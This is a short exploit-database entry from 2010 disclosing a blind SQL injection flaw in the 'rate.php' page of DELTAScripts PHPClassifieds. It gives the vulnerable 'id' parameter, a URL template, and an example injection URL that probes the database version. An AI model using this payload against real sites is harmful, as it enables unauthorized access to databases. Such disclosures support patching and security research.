DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection
Author: Hamza 'MizoZ' N. type: webapps platform: php port: date_added: 2010-01-07 date_updated: verified: 1 codes: tags: aliases: screenshot_url: application_url: raw file: 11071.txt
/* Name : DELTAScripts PHPClassifieds Vuln : Blind SQL Injection Author : Hamza 'MizoZ' N. Email : mizozx[at]gmail[dot]com WebSite : www.greymen.org<http://www.greymen.org> Greetz : Zuka, all friends & arab hackers */ Vulnerability is in the rate.php , $_GET['id'] [HOST]/[PATH]/rate.php?id=[true value]+[INJECTION] exemples : http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--